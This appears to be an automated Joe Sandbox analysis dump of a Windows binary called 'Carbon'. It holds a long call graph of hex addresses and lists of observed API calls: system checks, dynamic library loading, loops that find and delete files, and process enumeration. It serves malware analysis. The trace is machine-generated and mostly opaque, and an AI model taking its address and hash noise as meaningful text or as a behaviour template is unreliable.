calls 105966->105998 105968->105961 105968->105962 105968->105964 105968->105966 106008 91d2b5 39 API calls 105968->106008 105971 8faac3 105970->105971 105977 8faa49 __fread_nolock 105970->105977 105973 91015b 8 API calls 105971->105973 105972 91012b 8 API calls 105974 8faa50 105972->105974 105973->105977 105975 8faa6e 105974->105975 105976 91012b 8 API calls 105974->105976 105975->105957 105976->105975 105977->105972 105979 8fabe7 8 API calls 105978->105979 105980 8f6b4e 105979->105980 105981 9354a0 105980->105981 105983 8f6bbc 105980->105983 105984 8f6c63 8 API calls 105980->105984 105982 91012b 8 API calls 105981->105982 105985 9354aa 105982->105985 105986 8fb159 8 API calls 105983->105986 105984->105980 105989 91015b 8 API calls 105985->105989 105987 8f6bc3 CharUpperBuffW 105986->105987 105988 8f6bd5 105987->105988 105990 8f6bdc __fread_nolock 105988->105990 105991 8fab97 8 API calls 105988->105991 105989->105990 105990->105957 105991->105990 105995 8faba7 105992->105995 105993 91012b 8 API calls 105994 8fabba 105993->105994 105994->105957 105995->105993 105996->105948 105997->105938 105998->105965 106000 934816 105999->106000 106001 8f59f3 105999->106001 106003 91012b 8 API calls 106000->106003 106009 8f5a04 106001->106009 106005 934820 _wcslen 106003->106005 106004 8f59fe 106004->105965 106006 91015b 8 API calls 106005->106006 106007 934859 __fread_nolock 106006->106007 106008->105968 106010 8f5a14 _wcslen 106009->106010 106011 8f5a27 106010->106011 106012 934878 106010->106012 106019 8f6c63 106011->106019 106014 91012b 8 API calls 106012->106014 106016 934882 106014->106016 106015 8f5a34 __fread_nolock 106015->106004 106017 91015b 8 API calls 106016->106017 106018 9348b2 __fread_nolock 106017->106018 106020 8f6c79 106019->106020 106023 8f6c74 __fread_nolock 106019->106023 106021 935514 106020->106021 106022 91015b 8 API calls 106020->106022 106022->106023 106023->106015 106025 91015b 8 API calls 106024->106025 106026 90c0c2 106025->106026 106027 91012b 8 API 
calls 106026->106027 106028 90c0ce 106027->106028 106028->105462 106030 90faf0 106029->106030 106031 90fb27 106029->106031 106032 91015b 8 API calls 106030->106032 106041 90fe73 8 API calls 106031->106041 106034 90faf7 WideCharToMultiByte 106032->106034 106040 90fb30 8 API calls __fread_nolock 106034->106040 106036 90fb1b 106036->105467 106038 91012b 8 API calls 106037->106038 106039 8f3978 106038->106039 106039->105474 106039->105475 106040->106036 106041->106036 106043 8fae03 8 API calls 106042->106043 106044 8f70cd 106043->106044 106044->105489 106046 959760 106045->106046 106047 959752 106045->106047 106049 8f77ad 8 API calls 106046->106049 106048 8f8635 8 API calls 106047->106048 106050 95975e 106048->106050 106049->106050 106050->105501 106052 8f58eb 106051->106052 106056 8f590c __fread_nolock 106051->106056 106055 91015b 8 API calls 106052->106055 106053 91012b 8 API calls 106054 8f591f 106053->106054 106054->105501 106055->106056 106056->106053 106058 8f6ab6 106057->106058 106059 935409 106057->106059 106068 8f6ac7 106058->106068 106078 95115e 8 API calls __fread_nolock 106059->106078 106062 8f6ac2 106062->105499 106063 935413 106064 8fad69 8 API calls 106063->106064 106065 93541f 106063->106065 106064->106065 106066->105492 106067->105495 106069 8f6ad6 106068->106069 106074 8f6b0a __fread_nolock 106068->106074 106070 93543a 106069->106070 106071 8f6afd 106069->106071 106069->106074 106073 91012b 8 API calls 106070->106073 106072 8f6c63 8 API calls 106071->106072 106072->106074 106075 935449 106073->106075 106074->106062 106076 91015b 8 API calls 106075->106076 106077 93547d __fread_nolock 106076->106077 106078->106063 106081 961667 106079->106081 106092 961780 106079->106092 106080 9616b4 106083 91015b 8 API calls 106080->106083 106081->106080 106082 961687 106081->106082 106084 9616cb 106081->106084 106082->106080 106086 96169b 106082->106086 106097 9616a9 __fread_nolock 106083->106097 106085 91015b 8 API calls 106084->106085 106094 9616e8 106084->106094 
106085->106094 106088 91015b 8 API calls 106086->106088 106087 96170f 106089 91015b 8 API calls 106087->106089 106088->106097 106091 961715 106089->106091 106090 91012b 8 API calls 106090->106092 106098 90c130 8 API calls 106091->106098 106092->105522 106094->106086 106094->106087 106094->106097 106095 961721 106096 90fac6 10 API calls 106095->106096 106096->106097 106097->106090 106098->106095 106100 91012b 8 API calls 106099->106100 106101 90bb1e 106100->106101 106102 8fa1d4 8 API calls 106101->106102 106103 90bb29 106102->106103 106103->105527 106105 8f39b4 ___scrt_fastfail 106104->106105 106132 8f4dd2 106105->106132 106109 8f3a3a 106110 9339c2 Shell_NotifyIconW 106109->106110 106111 8f3a58 Shell_NotifyIconW 106109->106111 106136 8f5033 106111->106136 106113 8f3a6e 106113->105537 106115 8f2f76 106114->106115 106116 8f2f26 ___scrt_fastfail 106114->106116 106115->105537 106117 8f2f45 Shell_NotifyIconW 106116->106117 106117->106115 106118->105537 106119->105537 106121 8f7477 _wcslen 106120->106121 106122 9355fc 106120->106122 106125 8f748d 106121->106125 106126 8f74b2 106121->106126 106123 8f8635 8 API calls 106122->106123 106124 935605 106123->106124 106124->106124 106128 8f7851 8 API calls 106125->106128 106127 91012b 8 API calls 106126->106127 106130 8f74be 106127->106130 106129 8f7495 __fread_nolock 106128->106129 106129->105537 106131 91015b 8 API calls 106130->106131 106131->106129 106133 8f4dee 106132->106133 106134 8f3a09 106132->106134 106133->106134 106135 9340d9 DestroyIcon 106133->106135 106134->106109 106166 95ce59 42 API calls _strftime 106134->106166 106135->106134 106137 8f5132 106136->106137 106138 8f5050 106136->106138 106137->106113 106139 8f69c4 8 API calls 106138->106139 106140 8f505e 106139->106140 106141 8f506b 106140->106141 106142 9342ad LoadStringW 106140->106142 106143 8f7467 8 API calls 106141->106143 106145 9342c7 106142->106145 106144 8f5080 106143->106144 106146 8f508d 106144->106146 106153 9342e3 106144->106153 106148 8fad69 8 API 
calls 106145->106148 106152 8f50b3 ___scrt_fastfail 106145->106152 106146->106145 106147 8f5097 106146->106147 106149 8f59dc 8 API calls 106147->106149 106148->106152 106150 8f50a5 106149->106150 106151 8f6aa4 8 API calls 106150->106151 106151->106152 106154 8f5118 Shell_NotifyIconW 106152->106154 106153->106152 106155 8fae03 8 API calls 106153->106155 106156 934326 106153->106156 106154->106137 106157 93430d 106155->106157 106168 90fe35 51 API calls 106156->106168 106167 95a08a 9 API calls 106157->106167 106160 934318 106161 934345 106163 8f59dc 8 API calls 106161->106163 106166->106109 106167->106160 106168->106161 106170 8fae03 8 API calls 106169->106170 106171 95d678 106170->106171 106172 8fae03 8 API calls 106171->106172 106173 95d680 106172->106173 106174 8fae03 8 API calls 106173->106174 106175 95d688 106174->106175 106255 8f3ff7 106175->106255 106178 8f3ff7 9 API calls 106179 95d69c 106178->106179 106265 95e76d 106179->106265 106213 8fae03 8 API calls 106212->106213 106214 8f3e4a 106213->106214 106215 8fae03 8 API calls 106214->106215 106216 8f3e52 106215->106216 106217 8fae03 8 API calls 106216->106217 106218 8f3e5a 106217->106218 106219 8fae03 8 API calls 106218->106219 106220 8f3e62 106219->106220 106221 8f3e96 106220->106221 106222 933b78 106220->106222 106224 8f7642 8 API calls 106221->106224 106223 8fad69 8 API calls 106222->106223 106225 933b81 106223->106225 106226 8f3ea4 106224->106226 106227 8fabe7 8 API calls 106225->106227 106228 8f8635 8 API calls 106226->106228 106232 8f3ed9 106227->106232 106229 8f3eae 106228->106229 106230 8f7642 8 API calls 106229->106230 106229->106232 106231 8f3f1e 106232->106231 106234 8f3efa 106232->106234 106250 933ba3 106232->106250 106234->106231 106242 8f7467 8 API calls 106250->106242 106332 9322a0 106255->106332 106258 8f403e 106261 8fabe7 8 API calls 106258->106261 106259 8f4023 106260 8f7467 8 API calls 106259->106260 106262 8f402f 106260->106262 106261->106262 106334 8f699d 106262->106334 106266 8fae03 8 API 
calls 106265->106266 106333 8f4004 GetFullPathNameW 106332->106333 106333->106258 106333->106259 106335 8f69ab 106334->106335 106336 8f8635 8 API calls 106335->106336 106337 8f403b 106336->106337 106337->106178 106346 983296 106340->106346 106343 98330f timeGetTime 106343->105576 106344 8fb81d 39 API calls 106344->106343 106347 8fa35b 8 API calls 106346->106347 106348 9832b1 106347->106348 106349 9832db 106348->106349 106350 9832bd 106348->106350 106351 8f7467 8 API calls 106349->106351 106352 8f7e30 52 API calls 106350->106352 106355 9832d9 106351->106355 106353 9832ca 106352->106353 106354 8fad69 8 API calls 106353->106354 106353->106355 106354->106355 106355->106343 106355->106344 106357 8fae03 8 API calls 106356->106357 106358 95d9ad 106357->106358 106359 8fae03 8 API calls 106358->106359 106360 95d9b6 106359->106360 106361 8fae03 8 API calls 106360->106361 106362 95d9bf 106361->106362 106363 8f3ff7 9 API calls 106362->106363 106364 95d9ca 106363->106364 106365 95e7da GetFileAttributesW 106364->106365 106366 95d9d3 106365->106366 106367 95d9e5 106366->106367 106368 8f59dc 8 API calls 106366->106368 106369 8f3e34 8 API calls 106367->106369 106368->106367 106370 95d9f9 FindFirstFileW 106369->106370 106371 95da85 FindClose 106370->106371 106372 95da18 106370->106372 106377 95da90 106371->106377 106372->106371 106375 95da1c 106372->106375 106373 95da60 FindNextFileW 106373->106372 106373->106375 106374 8fad69 8 API calls 106374->106375 106375->106372 106375->106373 106375->106374 106376 8f6aa4 8 API calls 106375->106376 106378 8f59dc 8 API calls 106375->106378 106376->106375 106377->105583 106379 95da51 DeleteFileW 106378->106379 106379->106373 106380 95da7c FindClose 106379->106380 106380->106377 106381->105594 106383 8fb5fb 106382->106383 106384 94020c 106383->106384 106389 8fb603 messages 106383->106389 106385 91012b 8 API calls 106384->106385 106387 940218 106385->106387 106386 8fb60a 106386->105599 106389->106386 106390 8fb670 106389->106390 106391 8fb67b 
messages 106390->106391 106392 90e1db 8 API calls 106391->106392 106393 8fb6b6 messages 106391->106393 106392->106393 106393->106389 106394->105103 106395->105110 106396->105158 106397->105097 106398->105106 106399->105130 106400->105130 106401->105130 106402->105109 106403->105118 106404->105108 106405->105108 106407 8fb249 106406->106407 106413 8fb271 messages 106406->106413 106408 8fb257 106407->106408 106409 8fb23b 8 API calls 106407->106409 106410 8fb25d 106408->106410 106411 8fb23b 8 API calls 106408->106411 106409->106408 106412 8fb670 8 API calls 106410->106412 106410->106413 106411->106410 106412->106413 106413->105125 106414->105151 106415->105151 106416->105130 106417->105151 106418->105150 106419->105130 106421 900856 106420->106421 106437 9008ce 106420->106437 106422 900863 106421->106422 106423 945ae7 106421->106423 106430 945b0b 106422->106430 106433 90086d 106422->106433 106494 978305 229 API calls 2 library calls 106423->106494 106424 945adb 106493 963d0b 81 API calls __wsopen_s 106424->106493 106428 945b3c 106431 945b47 106428->106431 106432 945b69 106428->106432 106429 8ff1e0 229 API calls 106429->106437 106430->106428 106436 945b23 106430->106436 106496 978305 229 API calls 2 library calls 106431->106496 106497 975e10 8 API calls 106432->106497 106434 8fad69 8 API calls 106433->106434 106456 900880 messages 106433->106456 106434->106456 106435 900a55 106435->105200 106495 963d0b 81 API calls __wsopen_s 106436->106495 106437->106429 106437->106435 106443 94588f 106437->106443 106455 900a49 106437->106455 106463 9458a4 messages 106437->106463 106464 900994 106437->106464 106475 900a02 messages 106437->106475 106441 945a08 106451 8fad69 8 API calls 106441->106451 106441->106456 106490 963d0b 81 API calls __wsopen_s 106443->106490 106444 945d60 106446 945d96 106444->106446 106502 977ef8 65 API calls 106444->106502 106445 945b74 106449 945c08 106445->106449 106461 945b8f 106445->106461 106452 8fa35b 8 API calls 106446->106452 106499 961802 8 API 
calls 106449->106499 106451->106456 106477 9008c3 messages 106452->106477 106453 945d3e 106457 8f7e30 52 API calls 106453->106457 106454 945d74 106458 8f7e30 52 API calls 106454->106458 106455->106435 106489 963d0b 81 API calls __wsopen_s 106455->106489 106456->106444 106456->106477 106501 977db9 53 API calls __wsopen_s 106456->106501 106471 945d46 _wcslen 106457->106471 106474 945d7c _wcslen 106458->106474 106498 9611b5 8 API calls 106461->106498 106462 945c1a 106467 8fab97 8 API calls 106462->106467 106463->106475 106463->106477 106491 963d0b 81 API calls __wsopen_s 106463->106491 106464->106455 106488 900b40 8 API calls 106464->106488 106470 945c23 106467->106470 106468 9009f5 106468->106455 106468->106475 106469 945bb9 106473 9019c0 229 API calls 106469->106473 106500 9611b5 8 API calls 106470->106500 106471->106444 106472 8fa35b 8 API calls 106471->106472 106472->106444 106473->106456 106474->106446 106476 8fa35b 8 API calls 106474->106476 106475->106424 106475->106441 106475->106456 106475->106477 106492 90b215 229 API calls 106475->106492 106476->106446 106477->105200 106479 945c3c 106480 8fc210 229 API calls 106479->106480 106480->106456 106481->105200 106482->105200 106483->105200 106484->105202 106485->105195 106486->105195 106487->105195 106488->106468 106489->106477 106490->106463 106491->106475 106492->106475 106493->106423 106494->106456 106495->106477 106496->106456 106497->106445 106498->106469 106499->106462 106500->106479 106501->106453 106502->106454 106508 95e543 106503->106508 106504 95e55a 106510 91664b 39 API calls 106504->106510 106507 95e560 106507->105211 106508->106504 106508->106507 106509 916702 GetStringTypeW _strftime 106508->106509 106509->106508 106510->106507 106511 9445d7 106522 90e28e 106511->106522 106513 9445ed 106515 944668 106513->106515 106531 90a921 9 API calls 106513->106531 106516 8fc210 229 API calls 106515->106516 106517 9446b4 106516->106517 106519 94515e 106517->106519 106533 963d0b 81 API calls __wsopen_s 
106517->106533 106520 944648 106520->106517 106532 9621a8 8 API calls 106520->106532 106523 90e29c 106522->106523 106524 90e2af 106522->106524 106527 8fa35b 8 API calls 106523->106527 106525 90e2e2 106524->106525 106526 90e2b4 106524->106526 106529 8fa35b 8 API calls 106525->106529 106528 91012b 8 API calls 106526->106528 106530 90e2a6 106527->106530 106528->106530 106529->106530 106530->106513 106531->106520 106532->106515 106533->106519 106534 943fd7 106538 9617a9 106534->106538 106536 943fe2 106537 9617a9 52 API calls 106536->106537 106537->106536 106543 9617b6 106538->106543 106548 9617e3 106538->106548 106539 9617e5 106550 90fd37 52 API calls 106539->106550 106540 9617ea 106542 8f7e30 52 API calls 106540->106542 106544 9617f1 106542->106544 106543->106539 106543->106540 106546 9617dd 106543->106546 106543->106548 106545 8f6aa4 8 API calls 106544->106545 106545->106548 106549 8fb3b0 39 API calls 106546->106549 106548->106536 106549->106548 106550->106540 106551 942dd0 106577 8fdd50 messages 106551->106577 106552 8fe0b1 PeekMessageW 106552->106577 106553 8fdda7 GetInputState 106553->106552 106553->106577 106554 942254 TranslateAcceleratorW 106554->106577 106555 90f3b7 2 API calls 106555->106577 106556 8fe12f PeekMessageW 106556->106577 106557 8fe113 TranslateMessage DispatchMessageW 106557->106556 106558 8fdfa4 timeGetTime 106558->106577 106559 8fe14f Sleep 106559->106577 106560 94310a Sleep 106571 942fe7 106560->106571 106563 942370 timeGetTime 106584 90a921 9 API calls 106563->106584 106565 95dac1 46 API calls 106565->106571 106566 9431a1 GetExitCodeProcess 106567 9431b7 WaitForSingleObject 106566->106567 106568 9431cd CloseHandle 106566->106568 106567->106568 106567->106577 106568->106571 106569 98317d GetForegroundWindow 106569->106571 106571->106565 106571->106566 106571->106569 106572 8fdf75 106571->106572 106573 94323f Sleep 106571->106573 106571->106577 106588 90ef0e timeGetTime 106571->106588 106573->106577 106574 8fe2f0 229 API calls 106574->106577 
106575 95efbc 5 API calls 106575->106577 106576 8fe570 229 API calls 106576->106577 106577->106552 106577->106553 106577->106554 106577->106555 106577->106556 106577->106557 106577->106558 106577->106559 106577->106560 106577->106563 106577->106571 106577->106572 106577->106574 106577->106575 106577->106576 106579 8ff1e0 229 API calls 106577->106579 106580 9019c0 229 API calls 106577->106580 106581 8fc210 229 API calls 106577->106581 106583 90ef0e timeGetTime 106577->106583 106585 964199 8 API calls 106577->106585 106586 963d0b 81 API calls __wsopen_s 106577->106586 106587 975ddf 8 API calls 106577->106587 106579->106577 106580->106577 106581->106577 106583->106577 106584->106577 106585->106577 106586->106577 106587->106577 106588->106571 106589 90fa95 106590 90fac0 106589->106590 106591 90fa9f 106589->106591 106597 94faf6 106590->106597 106598 955443 8 API calls messages 106590->106598 106592 8fb23b 8 API calls 106591->106592 106594 90faaf 106592->106594 106595 8fb23b 8 API calls 106594->106595 106596 90fabf 106595->106596 106598->106590 106599 8f31c8 106600 8f31d5 __wsopen_s 106599->106600 106601 8f31ee 106600->106601 106602 933330 ___scrt_fastfail 106600->106602 106603 8f3ff7 9 API calls 106601->106603 106604 93334c GetOpenFileNameW 106602->106604 106605 8f31f7 106603->106605 106606 93339b 106604->106606 106615 8f318a 106605->106615 106608 8f7467 8 API calls 106606->106608 106610 9333b0 106608->106610 106610->106610 106612 8f320c 106633 8f515f 106612->106633 106616 9322a0 __wsopen_s 106615->106616 106617 8f3197 GetLongPathNameW 106616->106617 106618 8f7467 8 API calls 106617->106618 106619 8f31bf 106618->106619 106620 8f3c2f 106619->106620 106621 8fae03 8 API calls 106620->106621 106622 8f3c41 106621->106622 106623 8f3ff7 9 API calls 106622->106623 106624 8f3c4c 106623->106624 106625 8f3c57 106624->106625 106629 933b44 106624->106629 106626 8f58dc 8 API calls 106625->106626 106628 8f3c63 106626->106628 106627 90e224 41 API calls 106627->106629 106662 8f12f4 
106628->106662 106629->106627 106631 933b66 106629->106631 106632 8f3c76 106632->106612 106668 8f54de 106633->106668 106663 8f1306 106662->106663 106667 8f1325 __fread_nolock 106662->106667 106665 91015b 8 API calls 106663->106665 106664 91012b 8 API calls 106666 8f133c 106664->106666 106665->106667 106666->106632 106667->106664 106811 8f54a3 LoadLibraryA 106668->106811 106673 934660 106676 8f554c 68 API calls 106673->106676 106674 8f5509 LoadLibraryExW 106819 8f546c LoadLibraryA 106674->106819 106678 934667 106676->106678 106680 8f546c 3 API calls 106678->106680 106681 93466f 106680->106681 106840 8f56aa 106681->106840 106812 8f54bb GetProcAddress 106811->106812 106813 8f54d9 106811->106813 106814 8f54cb 106812->106814 106816 91e93b 106813->106816 106814->106813 106815 8f54d2 FreeLibrary 106814->106815 106815->106813 106846 91e87a 106816->106846 106818 8f54fd 106818->106673 106818->106674 106820 8f5481 GetProcAddress 106819->106820 106821 8f54a0 106819->106821 106822 8f5491 106820->106822 106824 8f5580 106821->106824 106822->106821 106823 8f5499 FreeLibrary 106822->106823 106823->106821 106825 91015b 8 API calls 106824->106825 106826 8f5595 106825->106826 106827 8f3966 8 API calls 106826->106827 106828 8f55a1 __fread_nolock 106827->106828 106829 9346da 106828->106829 106833 8f55dc 106828->106833 106919 963738 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 106828->106919 106841 8f56bc 106840->106841 106842 934778 106840->106842 106987 91ec14 106841->106987 106849 91e886 BuildCatchObjectHelperInternal 106846->106849 106847 91e894 106871 922b68 20 API calls __dosmaperr 106847->106871 106849->106847 106851 91e8c4 106849->106851 106850 91e899 106872 922aac 26 API calls ___std_exception_copy 106850->106872 106853 91e8d6 106851->106853 106854 91e8c9 106851->106854 106863 9283b1 106853->106863 106873 922b68 20 API calls __dosmaperr 106854->106873 106857 91e8df 106862 91e8a4 __wsopen_s 106862->106818 106864 9283bd 
BuildCatchObjectHelperInternal 106863->106864 106876 9232ae EnterCriticalSection 106864->106876 106866 9283cb 106877 92844b 106866->106877 106870 9283fc __wsopen_s 106870->106857 106871->106850 106872->106862 106873->106862 106876->106866 106884 92846e 106877->106884 106878 9284c7 106895 924fcd 106878->106895 106884->106878 106884->106884 106889 9283d8 106884->106889 106893 9194dd EnterCriticalSection 106884->106893 106894 9194f1 LeaveCriticalSection 106884->106894 106890 928407 106889->106890 106913 9232f6 LeaveCriticalSection 106890->106913 106892 92840e 106892->106870 106893->106884 106894->106884 106900 924fda BuildCatchObjectHelperInternal 106895->106900 106896 92501a 106911 922b68 20 API calls __dosmaperr 106896->106911 106897 925005 RtlAllocateHeap 106898 925018 106897->106898 106897->106900 106902 922d18 106898->106902 106900->106896 106900->106897 106910 9151fd 7 API calls 2 library calls 106900->106910 106910->106900 106911->106898 106913->106892 106919->106829 106990 91ec31 106987->106990 107402 9454dc 107403 91012b 8 API calls 107402->107403 107404 9454e3 107403->107404 107405 91015b 8 API calls 107404->107405 107408 9454fc __fread_nolock 107404->107408 107405->107408 107406 91015b 8 API calls 107407 945521 107406->107407 107408->107406 107409 8f1044 107414 8f2c6f 107409->107414 107451 8f4045 107414->107451 107418 8f2ce6 107419 8fae03 8 API calls 107418->107419 107420 8f2cf0 107419->107420 107421 8fae03 8 API calls 107420->107421 107422 8f2cfa 107421->107422 107423 8fae03 8 API calls 107422->107423 107424 8f2d04 107423->107424 107425 8fae03 8 API calls 107424->107425 107426 8f2d42 107425->107426 107427 8fae03 8 API calls 107426->107427 107428 8f2e0e 107427->107428 107461 8f540c 107428->107461 107497 8f409e 107451->107497 107454 8f409e 8 API calls 107455 8f407d 107454->107455 107456 8fae03 8 API calls 107455->107456 107457 8f4089 107456->107457 107458 8f7467 8 API calls 107457->107458 107459 8f2ca5 107458->107459 107460 8f2a8d 6 API calls 107459->107460 

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 008F4E97
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            • GetCurrentProcess.KERNEL32(?,0098DB24,00000000,?,?), ref: 008F4FAD
                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 008F4FB4
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 008F4FDF
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008F4FF1
                                                            • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 008F4FFF
                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 008F5006
                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 008F502B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 3290436268-192647395
                                                            • Opcode ID: c8693963af7e8ca8a607f91b8659818040cfd7b5da3cad365d8fa318c9af0c4b
                                                            • Instruction ID: 82811d49095b2c1fed8c76fda36c9dc53b9c07e94117bd83b37f805c1785937a
                                                            • Opcode Fuzzy Hash: c8693963af7e8ca8a607f91b8659818040cfd7b5da3cad365d8fa318c9af0c4b
                                                            • Instruction Fuzzy Hash: 0C91B032D3E3C8CFD716DB787C44DAA7FA4AB76F04B054899F184933A5D6294504EB22
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                              • Part of subcall function 008F3FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F3E0E,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 008F4017
                                                              • Part of subcall function 0095E7DA: GetFileAttributesW.KERNEL32(?,0095D57A), ref: 0095E7DB
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0095D707
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0095D7C2
                                                            • MoveFileW.KERNEL32(?,?), ref: 0095D7D5
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0095D7F2
                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0095D81C
                                                              • Part of subcall function 0095D881: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0095D801,?,?), ref: 0095D897
                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0095D838
                                                            • FindClose.KERNEL32(00000000), ref: 0095D849
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 1946585618-1173974218
                                                            • Opcode ID: 246eb1bc24a58783e1432d160dd814fd0714778915bf2eb9cb17d7ea8082c38e
                                                            • Instruction ID: e89da18b60cc5cd52c54f81427f33d0a39b1dfb55578b323c05dbc4d9a2f59a5
                                                            • Opcode Fuzzy Hash: 246eb1bc24a58783e1432d160dd814fd0714778915bf2eb9cb17d7ea8082c38e
                                                            • Instruction Fuzzy Hash: 7861587180210DAACF15EBA5DA829FDB7B9FF14311F204069E906B7192DB306F0DCB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                              • Part of subcall function 008F3FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F3E0E,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 008F4017
                                                              • Part of subcall function 0095E7DA: GetFileAttributesW.KERNEL32(?,0095D57A), ref: 0095E7DB
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0095DA05
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0095DA55
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0095DA66
                                                            • FindClose.KERNEL32(00000000), ref: 0095DA7D
                                                            • FindClose.KERNEL32(00000000), ref: 0095DA86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: d7a908eaedbede7ce8a38f4f163bf5574088d7e481a2d44acdd91fda6c315a59
                                                            • Instruction ID: 8a6f1fa771884599fca09d1756bc916a7efca6b0625e4a683b2efabeafa0bb57
                                                            • Opcode Fuzzy Hash: d7a908eaedbede7ce8a38f4f163bf5574088d7e481a2d44acdd91fda6c315a59
                                                            • Instruction Fuzzy Hash: FA315C7100D3499BC214EB68D8918AFB7E8BE95315F444E1DF9E5D2191EB209A0DCBA3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0095DAE6
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0095DAF4
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0095DB14
                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 0095DBC1
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3243318325-0
                                                            • Opcode ID: 6b66e97c6c9938c948c0b7884e5991a26c961910489240a803a911c589bbd30d
                                                            • Instruction ID: f2ade9c23949e506162e94479dc0846eccd05fcda27a5aa2d66928dbf68a494a
                                                            • Opcode Fuzzy Hash: 6b66e97c6c9938c948c0b7884e5991a26c961910489240a803a911c589bbd30d
